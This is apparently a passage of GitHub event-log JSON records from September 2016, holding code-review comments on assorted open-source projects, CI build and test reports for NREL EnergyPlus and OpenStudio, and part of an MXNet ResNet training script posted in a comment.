{"id":"4606553533","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140785,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T04:40:22Z","updated_at":"2016-09-23T04:40:22Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T04:40:22Z"}
{"id":"4606554714","type":"CommitCommentEvent","actor":{"login":"rejeesh09"},"repo":{"name":"rejeesh09/imad-2016-app"},"payload":{"comment":{"id":19140789,"position":null,"line":null,"path":null,"commit_id":"ad61ff937c28d85bb44aa248fbdc737aab03a09d","created_at":"2016-09-23T04:40:54Z","updated_at":"2016-09-23T04:40:54Z","body":"${port} doesn't show 8080"}},"created_at":"2016-09-23T04:40:54Z"}
{"id":"4606555298","type":"CommitCommentEvent","actor":{"login":"szczepiq"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19140790,"position":15,"line":14,"path":"src/main/java/org/mockito/internal/progress/SequenceNumber.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T04:41:10Z","updated_at":"2016-09-23T04:41:10Z","body":"I'm curious, why this change?"}},"created_at":"2016-09-23T04:41:10Z"}
{"id":"4606555508","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140792,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T04:41:16Z","updated_at":"2016-09-23T04:41:16Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T04:41:16Z"}
{"id":"4606555649","type":"CommitCommentEvent","actor":{"login":"CristianLlanos"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19140793,"position":6,"line":71,"path":"composer.json","commit_id":"7b483f79b76f5552aee1cdd7b0b2eec77e30a7a1","created_at":"2016-09-23T04:41:18Z","updated_at":"2016-09-23T04:41:18Z","body":"I'm just curious to know why we need \"tightenco/collect\". It's a copy of Illuminate\\Support\\Collection, isn't it?"}},"created_at":"2016-09-23T04:41:18Z"}
{"id":"4606555767","type":"CommitCommentEvent","actor":{"login":"wesuriner"},"repo":{"name":"imgd3000team2/game"},"payload":{"comment":{"id":19140794,"position":null,"line":null,"path":null,"commit_id":"467519c33df5d877cf8cdc32133c3d821577763a","created_at":"2016-09-23T04:41:23Z","updated_at":"2016-09-23T04:41:23Z","body":"ALSO, I am working on making a much larger background. Give me the specifications for the resolution and size and i will make a full length background"}},"created_at":"2016-09-23T04:41:23Z"}
{"id":"4606558026","type":"CommitCommentEvent","actor":{"login":"szczepiq"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19140799,"position":5,"line":94,"path":"src/main/java/org/mockito/internal/handler/MockHandlerImpl.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T04:42:30Z","updated_at":"2016-09-23T04:42:30Z","body":"Is this TODO still valid?"}},"created_at":"2016-09-23T04:42:30Z"}
{"id":"4606558075","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140800,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T04:42:32Z","updated_at":"2016-09-23T04:42:32Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2378 of 2378 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T04:42:32Z"}
{"id":"4606559921","type":"CommitCommentEvent","actor":{"login":"szczepiq"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19140803,"position":5,"line":96,"path":"src/test/java/org/mockito/internal/stubbing/defaultanswers/ReturnsGenericDeepStubsTest.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T04:43:25Z","updated_at":"2016-09-23T04:43:25Z","body":"Thanks! :)"}},"created_at":"2016-09-23T04:43:25Z"}
{"id":"4606563763","type":"CommitCommentEvent","actor":{"login":"szczepiq"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19140806,"position":5,"line":94,"path":"src/main/java/org/mockito/internal/handler/MockHandlerImpl.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T04:45:13Z","updated_at":"2016-09-23T04:45:13Z","body":"Ignore, it's in your branch :)"}},"created_at":"2016-09-23T04:45:13Z"}
{"id":"4606564582","type":"CommitCommentEvent","actor":{"login":"wldcordeiro"},"repo":{"name":"wldcordeiro/debugger.html"},"payload":{"comment":{"id":19140807,"position":8,"line":143,"path":"CONTRIBUTING.md","commit_id":"747e5f4326738e50b614bce5c1e28df28146483e","created_at":"2016-09-23T04:45:36Z","updated_at":"2016-09-23T04:45:36Z","body":"?"}},"created_at":"2016-09-23T04:45:36Z"}
{"id":"4606565932","type":"CommitCommentEvent","actor":{"login":"szczepiq"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19140809,"position":null,"line":null,"path":null,"commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T04:46:09Z","updated_at":"2016-09-23T04:46:09Z","body":"Exciting :) Does it mean that we can have mockito work with final classes / methods out of the box? Can you describe on high level how did you make it possible?"}},"created_at":"2016-09-23T04:46:09Z"}
{"id":"4606566193","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140810,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T04:46:16Z","updated_at":"2016-09-23T04:46:16Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T04:46:16Z"}
{"id":"4606566358","type":"CommitCommentEvent","actor":{"login":"sonnyg"},"repo":{"name":"cafeparadox/laser"},"payload":{"comment":{"id":19140812,"position":null,"line":null,"path":null,"commit_id":"83f4866d37900ee3a7be5dd189f1ebc964642d34","created_at":"2016-09-23T04:46:20Z","updated_at":"2016-09-23T04:46:20Z","body":"#2 example of how to use some css variables"}},"created_at":"2016-09-23T04:46:20Z"}
{"id":"4606567352","type":"CommitCommentEvent","actor":{"login":"alagumeenal"},"repo":{"name":"alagumeenal/imad-2016-app"},"payload":{"comment":{"id":19140814,"position":8,"line":8,"path":"ui/index.html","commit_id":"62c3c96a64e7fc6d0fa38c3a13660be0f8e3b05a","created_at":"2016-09-23T04:46:50Z","updated_at":"2016-09-23T04:46:50Z","body":"![m1](https://cloud.githubusercontent.com/assets/22209667/18774432/c3bbce86-8176-11e6-9421-feb74a412323.jpg)\r\n"}},"created_at":"2016-09-23T04:46:50Z"}
{"id":"4606568141","type":"CommitCommentEvent","actor":{"login":"francesca95"},"repo":{"name":"francesca95/command_hello"},"payload":{"comment":{"id":19140816,"position":null,"line":null,"path":null,"commit_id":"f23dee14bb6a39503fb94d56cd55cb8028e7febb","created_at":"2016-09-23T04:47:11Z","updated_at":"2016-09-23T04:47:11Z","body":"change_test"}},"created_at":"2016-09-23T04:47:11Z"}
{"id":"4606574266","type":"CommitCommentEvent","actor":{"login":"xavier-rdo"},"repo":{"name":"manala/manala"},"payload":{"comment":{"id":19140831,"position":null,"line":null,"path":null,"commit_id":"a97fa61e1d7c3f17199794f60ba643ee216440b8","created_at":"2016-09-23T04:50:04Z","updated_at":"2016-09-23T04:50:04Z","body":"👍 Thanx Robin !"}},"created_at":"2016-09-23T04:50:04Z"}
{"id":"4606584638","type":"CommitCommentEvent","actor":{"login":"gerardolozano51"},"repo":{"name":"gerardolozano51/Calculadora"},"payload":{"comment":{"id":19140850,"position":null,"line":null,"path":null,"commit_id":"7bc3d25c1600afbd3a2067e4480d409c4b1491cd","created_at":"2016-09-23T04:55:02Z","updated_at":"2016-09-23T04:55:02Z","body":"..."}},"created_at":"2016-09-23T04:55:02Z"}
{"id":"4606584694","type":"CommitCommentEvent","actor":{"login":"DevinBennett"},"repo":{"name":"DevinBennett/newGitTest"},"payload":{"comment":{"id":19140851,"position":null,"line":null,"path":null,"commit_id":"26cfd376017a19fd352fd3223fff73e4aec1ad12","created_at":"2016-09-23T04:55:04Z","updated_at":"2016-09-23T04:55:04Z","body":"gfssf"}},"created_at":"2016-09-23T04:55:04Z"}
{"id":"4606585100","type":"CommitCommentEvent","actor":{"login":"blesssecret"},"repo":{"name":"blesssecret/testProject"},"payload":{"comment":{"id":19140852,"position":2,"line":2,"path":"README.md","commit_id":"c60c4fefd2eedda67faae9364c0cb19c6f0815ae","created_at":"2016-09-23T04:55:14Z","updated_at":"2016-09-23T04:55:14Z","body":"ok"}},"created_at":"2016-09-23T04:55:14Z"}
{"id":"4606585307","type":"CommitCommentEvent","actor":{"login":"mvantellingen"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":19140853,"position":null,"line":null,"path":null,"commit_id":"d44f3fc73f6f2a9b567be3ece077d018cc49cfa6","created_at":"2016-09-23T04:55:20Z","updated_at":"2016-09-23T04:55:20Z","body":"Could you open a separate issue die this please? Otherwise lose track of it"}},"created_at":"2016-09-23T04:55:20Z"}
{"id":"4606589697","type":"CommitCommentEvent","actor":{"login":"xtwxy"},"repo":{"name":"xtwxy/mysc"},"payload":{"comment":{"id":19140861,"position":26,"line":null,"path":"package.json","commit_id":"8fc9654d2b80d541d93cef6f914d3b0eb2abd6ea","created_at":"2016-09-23T04:57:25Z","updated_at":"2016-09-23T04:57:25Z","body":"Indents organized.\n"}},"created_at":"2016-09-23T04:57:25Z"}
{"id":"4606591452","type":"CommitCommentEvent","actor":{"login":"chuan16"},"repo":{"name":"chuan16/pine"},"payload":{"comment":{"id":19140866,"position":null,"line":null,"path":null,"commit_id":"4bbfe0c167127ad9dfa7d0e09e1cc4f326fe528d","created_at":"2016-09-23T04:58:17Z","updated_at":"2016-09-23T04:58:17Z","body":"TI github code for android app"}},"created_at":"2016-09-23T04:58:17Z"}
{"id":"4606594147","type":"CommitCommentEvent","actor":{"login":"xtwxy"},"repo":{"name":"xtwxy/mysc"},"payload":{"comment":{"id":19140874,"position":4,"line":null,"path":"lib/app.js","commit_id":"8fc9654d2b80d541d93cef6f914d3b0eb2abd6ea","created_at":"2016-09-23T04:59:30Z","updated_at":"2016-09-23T04:59:30Z","body":"The package multer should be imported when using in the request handlers, not added globally."}},"created_at":"2016-09-23T04:59:30Z"}
{"id":"4606597325","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140884,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-23T05:00:49Z","updated_at":"2016-09-23T05:00:49Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (2342 of 2345 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T05:00:49Z"}
{"id":"4606597471","type":"CommitCommentEvent","actor":{"login":"JCharante"},"repo":{"name":"baxter-cs/AndOre"},"payload":{"comment":{"id":19140886,"position":null,"line":null,"path":null,"commit_id":"4b4a2742f278841af84225a995fc4b95e9b2b7af","created_at":"2016-09-23T05:00:53Z","updated_at":"2016-09-23T05:00:53Z","body":"Thanks"}},"created_at":"2016-09-23T05:00:53Z"}
{"id":"4606597690","type":"CommitCommentEvent","actor":{"login":"rmehta"},"repo":{"name":"frappe/frappe"},"payload":{"comment":{"id":19140887,"position":null,"line":null,"path":null,"commit_id":"eb9122a6f3fb179e4c954a9adbc6270b638bc169","created_at":"2016-09-23T05:00:58Z","updated_at":"2016-09-23T05:00:58Z","body":"@ASneha1 yes you are right, do you want to contribute a patch?"}},"created_at":"2016-09-23T05:00:58Z"}
{"id":"4606598085","type":"CommitCommentEvent","actor":{"login":"xtwxy"},"repo":{"name":"xtwxy/mysc"},"payload":{"comment":{"id":19140888,"position":4,"line":null,"path":".gitignore","commit_id":"a6b356536f1886de614ae4b45f59a767c90de91b","created_at":"2016-09-23T05:01:07Z","updated_at":"2016-09-23T05:01:07Z","body":"This line should be changed to \".project' removing the leading slash."}},"created_at":"2016-09-23T05:01:07Z"}
{"id":"4606600693","type":"CommitCommentEvent","actor":{"login":"Oscar-Deng"},"repo":{"name":"Oscar-Deng/Essay_coding"},"payload":{"comment":{"id":19140897,"position":52,"line":252,"path":"main_1996ver_functions.R","commit_id":"d544199a201dbc571ec4b446c4c55298eb84b4e3","created_at":"2016-09-23T05:02:14Z","updated_at":"2016-09-23T05:02:14Z","body":"save TEJ101 to csv file, and read in without rerunning functions.\r\nAdd lines to tableA*."}},"created_at":"2016-09-23T05:02:14Z"}
{"id":"4606602357","type":"CommitCommentEvent","actor":{"login":"Oscar-Deng"},"repo":{"name":"Oscar-Deng/Essay_coding"},"payload":{"comment":{"id":19140902,"position":57,"line":257,"path":"main_1996ver_functions.R","commit_id":"d544199a201dbc571ec4b446c4c55298eb84b4e3","created_at":"2016-09-23T05:03:04Z","updated_at":"2016-09-23T05:03:04Z","body":"Datasets using subset :: select(\"year\"= 2001:2010)"}},"created_at":"2016-09-23T05:03:04Z"}
{"id":"4606608760","type":"CommitCommentEvent","actor":{"login":"xtwxy"},"repo":{"name":"xtwxy/mysc"},"payload":{"comment":{"id":19140915,"position":11,"line":null,"path":"lib/mysql_pool.js","commit_id":"a6b356536f1886de614ae4b45f59a767c90de91b","created_at":"2016-09-23T05:05:59Z","updated_at":"2016-09-23T05:05:59Z","body":"The private settings for development machine should not be committed to hit."}},"created_at":"2016-09-23T05:05:59Z"}
{"id":"4606616207","type":"CommitCommentEvent","actor":{"login":"Babyyou"},"repo":{"name":"Babyyou/Food"},"payload":{"comment":{"id":19140945,"position":null,"line":null,"path":null,"commit_id":"d2a5341ebd879f2fe0479fe86ca5e87ff55d39fc","created_at":"2016-09-23T05:09:28Z","updated_at":"2016-09-23T05:09:28Z","body":"add shap shap shap"}},"created_at":"2016-09-23T05:09:28Z"}
{"id":"4606619238","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19140978,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T05:10:54Z","updated_at":"2016-09-23T05:10:54Z","body":"Nice! Thank you"}},"created_at":"2016-09-23T05:10:54Z"}
{"id":"4606621708","type":"CommitCommentEvent","actor":{"login":"fredy314"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19140980,"position":4,"line":0,"path":"frontend/controllers/CountryController.php","commit_id":"98f7bc397a804dcba973641c5524df7b6ddf7af7","created_at":"2016-09-23T05:12:02Z","updated_at":"2016-09-23T05:12:02Z","body":"А без этой строки виджет в админке не сможет загрузить список областей и городов. Поскольку у фронтенда и бекенда разнык домены. Единственно можно вместо звездочки передавать правильный домен"}},"created_at":"2016-09-23T05:12:02Z"}
{"id":"4606625958","type":"CommitCommentEvent","actor":{"login":"sbcgua"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19140991,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T05:14:02Z","updated_at":"2016-09-23T05:14:02Z","body":"Do you mean to the log instead of page center ?"}},"created_at":"2016-09-23T05:14:02Z"}
{"id":"4606626175","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140992,"position":null,"line":null,"path":null,"commit_id":"354af454e8ad03c27b9058926c4ed93eaf753661","created_at":"2016-09-23T05:14:07Z","updated_at":"2016-09-23T05:14:07Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-354af454e8ad03c27b9058926c4ed93eaf753661-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-354af454e8ad03c27b9058926c4ed93eaf753661-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T05:14:07Z"}
{"id":"4606627061","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19140994,"position":null,"line":null,"path":null,"commit_id":"990dcd902138ea332aafd8f0b218a71dc32f76aa","created_at":"2016-09-23T05:14:33Z","updated_at":"2016-09-23T05:14:33Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/990dcd902138ea332aafd8f0b218a71dc32f76aa#commitcomment-19140557) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/fbd634c7c452f55d906c903ff48974b038b02ccc/daily_2016_9_23/report.md). cc @jrevels"}},"created_at":"2016-09-23T05:14:33Z"}
{"id":"4606629361","type":"CommitCommentEvent","actor":{"login":"sasikumardr"},"repo":{"name":"mgechev/angular2-seed"},"payload":{"comment":{"id":19141002,"position":null,"line":null,"path":null,"commit_id":"b2a7dfb87d6b2f1680c6607cbb8a9dc46df723a5","created_at":"2016-09-23T05:15:41Z","updated_at":"2016-09-23T05:15:41Z","body":"2 things missing here\r\n\r\n1) `^${this.APP_BASE}${this.APP_SRC}\\/.*$` will help loading source files from source maps. This is missing here.\r\n\r\n2) Css mapping, we have to take care, it is special handling different from other rewrites (/css to /dist/dev/css)"}},"created_at":"2016-09-23T05:15:41Z"}
{"id":"4606629372","type":"CommitCommentEvent","actor":{"login":"horusdebugger"},"repo":{"name":"bobbylight/AutoComplete"},"payload":{"comment":{"id":19141003,"position":null,"line":null,"path":null,"commit_id":"26db250ae3fd505fe3fab1aba0c42d564a75e549","created_at":"2016-09-23T05:15:41Z","updated_at":"2016-09-23T05:15:41Z","body":"Thank you for your hard work!!! RSTA is amazing!!! :)"}},"created_at":"2016-09-23T05:15:41Z"}
{"id":"4606629597","type":"CommitCommentEvent","actor":{"login":"Jak-o-Shadows"},"repo":{"name":"libopencm3/libopencm3"},"payload":{"comment":{"id":19141004,"position":null,"line":null,"path":null,"commit_id":"60ca09c61e28a86f7bfc2133503cc603f415d3a8","created_at":"2016-09-23T05:15:46Z","updated_at":"2016-09-23T05:15:46Z","body":"On my CENTOS 7 system with awk 4.0.2, this commit causes the awk script to fail. Note that it also fails the genlinktests."}},"created_at":"2016-09-23T05:15:46Z"}
{"id":"4606630335","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"maorninja/Blargboard-XD"},"payload":{"comment":{"id":19141007,"position":null,"line":null,"path":null,"commit_id":"126559cd6c5335235d33b517efd81771bdbf1189","created_at":"2016-09-23T05:16:07Z","updated_at":"2016-09-23T05:16:07Z","body":"[I didn't find any major differences between 1.1 and 1.2](https://github.com/phase/blargdiff)."}},"created_at":"2016-09-23T05:16:07Z"}
{"id":"4606633755","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141015,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T05:17:43Z","updated_at":"2016-09-23T05:17:43Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1198 of 1198 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T05:17:43Z"}
{"id":"4606635473","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19141019,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-23T05:18:22Z","updated_at":"2016-09-23T05:18:22Z","body":"I want to remove it because a lot of reasons"}},"created_at":"2016-09-23T05:18:22Z"}
{"id":"4606636118","type":"CommitCommentEvent","actor":{"login":"elhajja"},"repo":{"name":"OSU-CS290-F16/assignment-0-elhajja"},"payload":{"comment":{"id":19141020,"position":null,"line":null,"path":null,"commit_id":"85dd51c2cdafd8ac08800551e2f697987a33a0aa","created_at":"2016-09-23T05:18:40Z","updated_at":"2016-09-23T05:18:40Z","body":"I changed name and onid ID "}},"created_at":"2016-09-23T05:18:40Z"}
{"id":"4606644811","type":"CommitCommentEvent","actor":{"login":"zreigz"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19141036,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-23T05:22:40Z","updated_at":"2016-09-23T05:22:40Z","body":"In my opinion it's better to have one argument --from-file because second arg also for file can cause some confusion in users. Second the most important thing is that user can point directory with text and binary files and solution should handle all this files in the same time. When I add another arg --from-binary-file user must prepare separate directories with binary and text file and it's not convenient "}},"created_at":"2016-09-23T05:22:40Z"}
{"id":"4606645367","type":"CommitCommentEvent","actor":{"login":"nabinhait"},"repo":{"name":"frappe/frappe"},"payload":{"comment":{"id":19141038,"position":null,"line":null,"path":null,"commit_id":"eb9122a6f3fb179e4c954a9adbc6270b638bc169","created_at":"2016-09-23T05:22:56Z","updated_at":"2016-09-23T05:22:56Z","body":"fixed."}},"created_at":"2016-09-23T05:22:56Z"}
{"id":"4606648084","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":19141044,"position":null,"line":null,"path":null,"commit_id":"c89f9dc8cc02115d537e92d156e22ca6af7d8acf","created_at":"2016-09-23T05:24:12Z","updated_at":"2016-09-23T05:24:12Z","body":"@magol  I made the change because of a report in the google group\r\nhttps://groups.google.com/forum/#!topic/dokan/LiMfnb_BHAs\r\n\r\nIt surprise me that he still get a throw with the check :O"}},"created_at":"2016-09-23T05:24:12Z"}
{"id":"4606648862","type":"CommitCommentEvent","actor":{"login":"mli"},"repo":{"name":"tornadomeet/ResNet"},"payload":{"comment":{"id":19141048,"position":null,"line":null,"path":null,"commit_id":"2042cc9fccab0bd488e93ed1311328b1de8eea48","created_at":"2016-09-23T05:24:34Z","updated_at":"2016-09-23T05:24:34Z","body":"kwargs doesn't work well.\r\n\r\ni rewrote a `train_model.py`\r\n\r\n```\r\nimport os\r\nos.environ[\"MXNET_CUDNN_AUTOTUNE_DEFAULT\"]=\"1\"\r\nimport argparse\r\nimport logging\r\n\r\ndef get_iterator(args, kv):\r\n    data_shape = (3, args.data_shape, args.data_shape)\r\n    train = mx.io.ImageRecordIter(\r\n        path_imgrec         = args.data_train,\r\n        label_width         = 1,\r\n        data_name           = 'data',\r\n        label_name          = 'softmax_label',\r\n        data_shape          = data_shape,\r\n        batch_size          = args.batch_size,\r\n        rand_crop           = True,\r\n        max_random_scale    = 1.0,\r\n        min_random_scale    = args.min_random_scale,\r\n        max_aspect_ratio    = args.max_aspect_ratio,\r\n        random_h            = args.random_h,\r\n        random_s            = args.random_s,\r\n        random_l            = args.random_l,\r\n        max_rotate_angle    = args.max_rotate_angle,\r\n        max_shear_ratio     = args.max_shear_ratio,\r\n        rand_mirror         = True,\r\n        shuffle             = True,\r\n        num_parts           = kv.num_workers,\r\n        part_index          = kv.rank)\r\n    val = mx.io.ImageRecordIter(\r\n        path_imgrec         = args.data_val,\r\n        label_width         = 1,\r\n        data_name           = 'data',\r\n        label_name          = 'softmax_label',\r\n        batch_size          = args.batch_size,\r\n        data_shape          = data_shape,\r\n        rand_crop           = False,\r\n        rand_mirror         = False,\r\n        num_parts           = kv.num_workers,\r\n        part_index          = kv.rank)\r\n    return (train, val)\r\n\r\ndef get_symbol(args):\r\n    from symbol_resnet import resnet\r\n    if args.depth == 18:\r\n        units = [2, 2, 2, 2]\r\n    elif args.depth == 34:\r\n        units = [3, 4, 6, 3]\r\n    elif args.depth == 50:\r\n        units = [3, 4, 6, 3]\r\n    elif args.depth == 101:\r\n        units = [3, 4, 23, 3]\r\n    elif args.depth == 152:\r\n        units = [3, 8, 36, 3]\r\n    elif args.depth == 200:\r\n        units = [3, 24, 36, 3]\r\n    else:\r\n        raise ValueError(\"no experiments done on detph {}, you can do it youself\".format(args.depth))\r\n    filters=[int(f) for f in args.filters.split(',')]\r\n    symbol = resnet(units       = units,\r\n                    num_stage   = 4,\r\n                    filter_list = filters,\r\n                    num_class   = args.num_classes,\r\n                    data_type   = \"imagenet\",\r\n                    bottle_neck = True,\r\n                    bn_mom      = args.bn_mom,\r\n                    workspace   = args.workspace,\r\n                    memonger    = args.memonger)\r\n    return symbol\r\n\r\ndef multi_factor_scheduler(begin_epoch, epoch_size, step, factor):\r\n    step_ = [epoch_size * (x-begin_epoch) for x in step if x-begin_epoch > 0]\r\n    return mx.lr_scheduler.MultiFactorScheduler(step=step_, factor=factor)\r\n\r\ndef fit(args):\r\n    symbol = get_symbol(args)\r\n    kv = mx.kvstore.create(args.kv_store)\r\n    head = '%(asctime)-15s Node[' + str(kv.rank) + '] %(message)s'\r\n    logging.basicConfig(level=logging.DEBUG, format=head)\r\n    if kv.rank == 0:\r\n        logging.info('start with arguments %s', args)\r\n\r\n    model_prefix = args.model_prefix + \"-%d\" % (kv.rank)\r\n    checkpoint = mx.callback.do_checkpoint(model_prefix)\r\n    arg_params = None\r\n    aux_params = None\r\n    if args.retrain:\r\n        _, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, args.load_epoch)\r\n\r\n    if args.memonger:\r\n        import memonger\r\n        data_shape = (3, args.data_shape, args.data_shape)\r\n        